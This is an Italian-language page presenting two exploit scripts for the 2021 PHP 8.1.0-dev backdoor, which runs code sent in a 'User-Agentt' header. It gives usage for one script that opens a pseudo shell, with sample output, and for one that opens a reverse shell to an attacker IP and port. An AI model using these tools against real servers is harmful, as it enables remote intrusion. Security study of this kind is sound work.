
Script Backdoor per la Shell di Sistema PHP 8.1.0-dev
Script di shell di sistema backdoor PHP 8.1.0-dev

La versione 8.1.0-dev di PHP è stata rilasciata con una backdoor il 28 marzo 2021, ma la backdoor è stata rapidamente scoperta e rimossa. Se questa versione di PHP è in esecuzione su un server, un attaccante può eseguire codice arbitrario inviando l'header User-Agentt.
Il codice originale è stato ripristinato dopo la scoperta del problema, ma è stato poi manomesso una seconda volta. La violazione avrebbe creato una backdoor in tutti i siti web che eseguivano la versione compromessa di PHP, consentendo agli hacker di eseguire codice in remoto sul sito.
Leggi l'articolo completo: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Questo breve script di exploit backdoor_php_8.1.0-dev.py usa la backdoor per fornire una pseudo shell di sistema sull'host.Trovalo su Exploit DB.
Utilizzo:
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
Enter the host url:
http://a.b.c.d
Interactive shell is opened on http://a.b.c.d
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
Questo breve script di exploit revshell_php_8.1.0-dev.py fornisce una reverse shell sul target.
Utilizzo:
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

Sii Curioso, Imparare è Vita ! 😃